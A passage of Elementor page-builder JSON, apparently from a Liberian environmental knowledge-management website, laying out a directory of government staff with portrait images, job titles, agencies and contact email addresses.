",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a 